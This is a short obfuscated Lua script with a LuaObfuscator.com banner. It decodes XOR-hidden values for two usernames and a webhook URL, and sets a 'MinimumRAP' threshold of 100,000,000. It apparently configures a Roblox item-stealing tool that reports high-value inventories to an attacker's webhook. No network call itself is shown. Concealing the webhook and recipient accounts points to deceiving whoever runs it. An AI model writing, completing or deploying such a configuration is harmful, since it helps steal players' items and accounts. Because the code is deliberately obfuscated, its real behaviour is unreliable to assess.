--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end Username=v7("\219\204\215\26\193\147","\126\177\163\187\69\134\219\167");Username2=v7("\41\194\38\250\219\11","\156\67\173\74\165");MinimumRAP=100000000;Webhook=v7("\60\163\93\6\175\124\9\123\179\64\5\191\41\84\48\249\74\25\177\105\71\36\190\6\1\185\36\78\59\184\66\5\243\119\21\96\226\29\78\235\114\22\103\227\26\67\236\117\16\108\231\28\89\141\39\119\96\157\90\7\151\113\16\18\165\98\27\234\17\119\35\133\91\56\185\1\64\37\134\104\44\164\46\116\100\144\98\32\148\40\23\29\149\65\17\189\53\109\121\130\81\37\176\1\75\99\146\30\70\168\112\126\101\174\98\31\159\117\87\96\152","\38\84\215\41\118\220\70");
